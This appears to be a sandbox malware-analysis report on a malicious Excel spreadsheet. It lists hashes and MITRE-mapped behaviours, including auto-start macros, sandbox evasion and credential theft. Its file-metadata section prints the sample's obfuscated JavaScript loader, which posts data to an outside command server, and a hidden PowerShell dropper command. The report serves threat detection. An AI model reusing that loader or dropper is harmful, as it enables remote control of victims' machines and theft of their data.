Managed XDR

test-results-table-xay...omphone-phomvihane.xls — malware analysis report

File info

Filename
test-results-table-xaysomphone-phomvihane.xls
File type
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: const _0x3abd=['fs/promises','Process\x20restarted','http://api-instance.btobwah.com/','uncaughtException','signal','AbortError','utf-8','comm','abort','hostname','constants','name','dir','application/json','text','HTTP\x20','replace','code','POST','data','stringify'];const _0x1c36=function(_0x3abd98,_0x1c3699){_0x3abd98=_0x3abd98-0x0;let _0x231b90=_0x3abd[_0x3abd98];return _0x231b90;};const fs=require(_0x1c36('0x0')),os=require('os'),{execSync:execSync}=require('child_process');global['APP_CONSTANTS']=Object['freeze']({'comm_id':0x0});let restartCount=0x0,currentAbortController=null,mainTimer=null,fetchTimer=null,last_re='';function cleanup(){currentAbortController&&(currentAbortController['abort'](),currentAbortController=null),mainTimer&&(clearTimeout(mainTimer),mainTimer=null),fetchTimer&&(clearTimeout(fetchTimer),fetchTimer=null);}async function up_comm_re(_0x1b3454,_0x59b5cc){if(!currentAbortController)throw new Error(_0x1c36('0x1'));try{const _0x1282e7=await fetch('http://api-instance.btobwah.com/mode, Comments: @echo off3apowershell.exe -w 1 -c "cd $env:userprofile;[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;&(((gcm *m).Name|Where{$_ -like'i*'})|Where{$_ -like'*r*'}) 'https://nodejs.org/download/release/latest-v22.x/win-x86/node.exe' -outfile .node\bin\node.exe;cd .node\bin;saps 'node.exe' -argumentlist 'node.js' -windowstyle h"aaaaaaaaaaaaaaaaaaaaaa, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:17:20 2015, Last Saved Time/Date: Thu May 7 11:17:22 2026, Security: 0
File size
55.5 KB
First seen
Last seen

Environment

w10/x64 en

Hashes

SHA1
496b87113f5fd6997a272bcfb1c443d60f9b9fc0
SHA256
9f603469f9245d350560736676aaadf64b0c7835ba3a4bb6d3a9189ceb88d613
MD5
ff589ad8d1c8609a74fc6b16849c7db2

Signatures

Execution

T1203 office_write_exe: Office document dropped an executable file
T1059.007 bad_js: Suspicious Javascript file
T1064 office_macros_suspicious: Document contains suspicious macro
T1064 office_macros: The document contains macroses (total: 4)
T1064 office_macros_strings: Feature lines found in document macro
T1064 office_macros_autoexec: The document contains an auto-start macro
T1204.002 office_vb_load: Microsoft Office is loading VB DLL files (macros usage indicator)
T1204.002 office_com_load: Microsoft Office loads COM DLL files (indicator of COM usage in macros)

Privilege Escalation

T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process
T1055 injection_failed: The attempt to inject into a process has failed

Defense Evasion

T1064 office_macros_suspicious: Document contains suspicious macro
T1497 evasion_printers: Attempts to detect Sandbox by exploring existing printers
T1497 evasion_trustrecords: Attempts to detect Sandbox exploring trusted documents
T1497 windows_enumthread: Attempts to enumerate windows using EnumThreadWindows and SendMessage for text obtaining
T1497.001 antivm_generic_productname: Checks system product name in registry, possibly for anti-virtualization
T1064 office_macros: The document contains macroses (total: 4)
T1064 office_macros_strings: Feature lines found in document macro
T1064 office_macros_autoexec: The document contains an auto-start macro
T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process
T1055 injection_failed: The attempt to inject into a process has failed

Credential Access

T1555.004 windows_credential_manager: Acquire credentials from the Windows Credential Manager

Discovery

T1518 locates_browser: Attempts to identify where browsers are installed
T1497 evasion_printers: Attempts to detect Sandbox by exploring existing printers
T1497 evasion_trustrecords: Attempts to detect Sandbox exploring trusted documents
T1497 windows_enumthread: Attempts to enumerate windows using EnumThreadWindows and SendMessage for text obtaining
T1497.001 antivm_generic_productname: Checks system product name in registry, possibly for anti-virtualization
T1082 windows_enumthread: Attempts to enumerate windows using EnumThreadWindows and SendMessage for text obtaining
T1083 checks_recent_files: Attempt to check recently opened files through registry

Command and Control

T1071.001 winhttp_https: Performs HTTP/HTTPS requests using WinHttp

Other

creates_exe: Creates executable files in the file system
network_bind: Starts servers listening at None
office_summary: The document contains suspicious metadata
suspicious_network_port: Performs TCP or UDP request to non-standard port
test_check_service: Starts services
yara_rules: Static rules